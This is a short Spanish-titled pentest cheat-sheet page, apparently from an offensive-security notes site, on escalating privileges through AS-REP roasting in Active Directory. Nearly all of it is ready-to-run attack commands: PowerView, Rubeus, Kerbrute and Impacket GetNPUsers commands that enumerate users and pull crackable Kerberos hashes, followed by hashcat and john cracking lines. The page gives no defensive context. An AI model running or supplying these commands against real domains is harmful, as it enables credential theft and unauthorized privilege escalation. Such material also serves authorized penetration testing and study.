PE - AS-REPRoast

Escalada de privilegios a través de ASP-REPRoasting

PowerView

Get-DomainUser -PreauthNotRequired

Rubeus -https://github.com/GhostPack/Rubeus

# Extract from all domain accounts
.\\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast

Kerbrute -https://github.com/ropnop/kerbrute

./kerbrute userenum <Wordlist> --dc <IP> --domain <Domain>
kerbrute userenum names.txt --dc 10.10.10.10 --domain security.local

Impacket -https://github.com/SecureAuthCorp/impacket

# No domain credential. Bruteforce names with Wordlist
python2 GetNPUsers.py  <Domain/> -dc-ip <IP> -usersfile <Wordlist> -format <john | hashcat> | grep -v 'Kerberos SessionError:'
python2 GetNPUsers.py  security/ -dc-ip 10.10.10.10 -usersfile names.txt -format john | grep -v 'Kerberos SessionError:'

# Valid domain credentials. Extract from all domain accounts
python2 GetNPUsers.py <Domain>/<User>:<Password> -request -format <john | hashcat> | grep "$krb5asrep$"
python2 GetNPUsers.py  security.local/bart:'StrongPassword!!' -request -dc-ip 10.10.10.10 -format john | grep "$krb5asrep$"

Cracking

Windows
hashcat64.exe -m 18200 c:Hashes.txt rockyou.txt
Linux
john --wordlist rockyou.txt Hashes.txt hashcat -m 18200 -a 3 Hashes.txt rockyou.txt

PreviousLocal Privilege Escalation NextPE - DNSAdmin

Last updated 2 years ago

Was this helpful?